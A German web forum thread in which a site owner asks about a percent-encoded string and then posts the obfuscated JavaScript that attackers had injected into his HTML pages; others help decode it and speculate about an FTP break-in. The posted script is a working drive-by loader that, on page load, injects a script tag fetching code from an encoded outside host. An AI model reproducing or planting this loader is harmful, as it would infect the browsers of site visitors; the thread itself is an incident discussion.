cross: Komische %ZahlBuchstabe-Zeichen

Hallöchen auch,

habe folgendes gefunden und weiß es im Moment nicht richtig einzuordnen:

%2f%34%33%39%39%2e%63%6f%6d%2f%34%33%39%39%2e .. usw

Ist das nicht ein codierter String, so wie man es manchmal in URLs findet? Wie kann ich das übersetzen?

Danke im voraus.

MfG
cross

  1. @@cross:

    nuqneH

    %2f%34%33%39%39%2e%63%6f%6d%2f%34%33%39%39%2e .. usw

    Ist das nicht ein codierter String, so wie man es manchmal in URLs findet? Wie kann ich das übersetzen?

    Ja. Unicode Code Converter.

    Qapla'

    --
    Gut sein ist edel. Andere lehren, gut zu sein, ist noch edler. Und einfacher.
    (Mark Twain)
  2. Hallo,

    %2f%34%33%39%39%2e%63%6f%6d%2f%34%33%39%39%2e .. usw

    /4399.com/4399.

    sieht noch nicht sooo furchtbar sinnvoll aus.

    Ist das nicht ein codierter String, so wie man es manchmal in URLs findet? Wie kann ich das übersetzen?

    Indem du den Kontext [k|n]ennst, in dem das vorkommt.

    So long,
     Martin

    --
    Einer aktuellen Erhebung zufolge sind zehn von neun Ehefrauen eifersüchtig auf ihren Mann.
  3. Hallöchen auch,

    vielen Dank an Euch!

    Hintergrund ist dieses sehr böse Script, mit welchem zahlreiche html-seiten durch anhängen per Exploid verseucht wurden:

    <Codeteile wurden aus sicherheitsgründen entfernt>

      
    <script>  
      
      function i(){  
       var _k=new String();  
       var A=unescape;  
       var dn="";  
       var r="\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x66\x6c\x2d\x63\x6f\x6d\x2e\x79\x69\x6d\x67\x2e\x63\x6f\x6d\x2e\x72\x61\x64\x69\x6b\x61\x6c\x2d\x72\x75\x2e\x72\x65\x61\x6c\x68\x65\x6c\x70\x67\x75\x69\x64\x65\x2e\x72\x75\x3a";  
       var n=new Array();  
       var H="6XRg".substr(3);  
       var Y;if(Y!='m' && Y!='w'){  
        Y=''  
       };  
       var I=new Date();  
       var N=window;  
       var y;  
        if(y!='Gn'){  
         y=''  
        };  
       var b;  
        if(b!='YE'){  
         b=''  
        };  
       var u='';  
       var R=new String();  
      
       function f(W,Q){  
        var Mu;  
         if(Mu!='P' && Mu!='Xv'){  
          Mu='P'  
         };  
        var O=A("%5b")+Q+A("%5d");  
        var _=new RegExp(O, H);  
         this.cv="";  
        var Cd;  
         if(Cd!='' && Cd!='l'){  
          Cd='bC'  
         };  
        return W.replace(_, u);  
         this.D_="";  
       };  
      
       var Eu=new Date();  
       var fm=new Date();  
       var z='';  
       this.ZQ="";  
       var lK;  
       if(lK!='ZL' && lK!='Cz'){  
        lK=''  
       };  
       this.fo='';  
       var s=document;  
       var Md=new Date();  
       var F=A("%2f%34%33%39%39%2e%63%6f%6d%2f%34%33%39%39%2e%63%6f%6d%2f%6d%70%6e%72%73%2e%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%77%72%65%74%63%68%2e%63%63%2e%70%68%70");  
       var Te='';  
       var Tep='';  
       var Q_=f('8999539102367785151901575','31925674');  
       this.u_="";  
       var Zi;  
        if(Zi!='Hq' && Zi!='HX'){  
         Zi='Hq'  
        };  
      
       function c(){  
        var v_="";  
        this.ne="";  
        var IN;  
         if(IN!='Dc' && IN != ''){  
          IN=null  
         };  
        z=r;  
        var ll=new Date();  
        var FX;  
         if(FX!='DP'){  
          FX='DP'  
         };  
        z+=Q_;  
        var yR='';  
        z+=F;  
        var OV=new Array();  
         try {  
          var K;  
           if(K!=''){  
            K='fP'  
           };  
          J=s.createElement(f('s9corfinpfth','oRDn1E9aUJgfh2Q'));  
          var un=new String();  
          var zD;  
           if(zD!=''){  
            zD='dw'  
           };  
          J.defer=[1,4][0];  
          J.src=z;  
          var Fk;  
           if(Fk!='mB' && Fk!='jc'){  
            Fk='mB'  
           };  
          var KY;  
           if(KY!='Xr' && KY!='yv'){  
            KY='Xr'  
           };  
          s.body.appendChild(J);  
          var ib;  
           if(ib!='' && ib!='of'){  
            ib=''  
           };  
         }  
         catch(X){  
          this.e="";  
         };  
       }  
      
       this.CU="";  
       var lJ;  
        if(lJ!='OVH'){  
         lJ='OVH'  
        };  
       N[String("on"+"lo"+"ad")]=c;  
       var vm;  
        if(vm!='' && vm!='mY'){  
         vm=''  
        };  
       var Qu;  
        if(Qu!='' && Qu!='Jb'){  
         Qu=''  
        };  
       var ZU="";  
       var fw="";  
      };  
      
    </script>  
    
    

    Unter anderem sind dort die Urls codiert, von wo wohl Schadware nachgeladen werden soll.

    MfG
    cross

    1. Grüße,
      was soll das ganze dann anstellen,m bzw wie breitet es sich aus? guestbooks mit erlaubtem js oder was?
      MFG
      bleicher

      --
      __________________________-

      FirefoxMyth
      1. Hallöchen auch,

        was soll das ganze dann anstellen,m bzw wie breitet es sich aus? guestbooks mit erlaubtem js oder was?

        Wenn wir das schon wüssten. Vermutlich wurde das Teil durch einen unauthorisierten? ftp-account auf den Server geladen. Wir wissen es noch nicht. ://

        Vor allem wundert es (mich) doch sehr, dass ein einfaches <script> am Anfang zu reichen scheint, um es ausführen zu können.

        MfG
        cross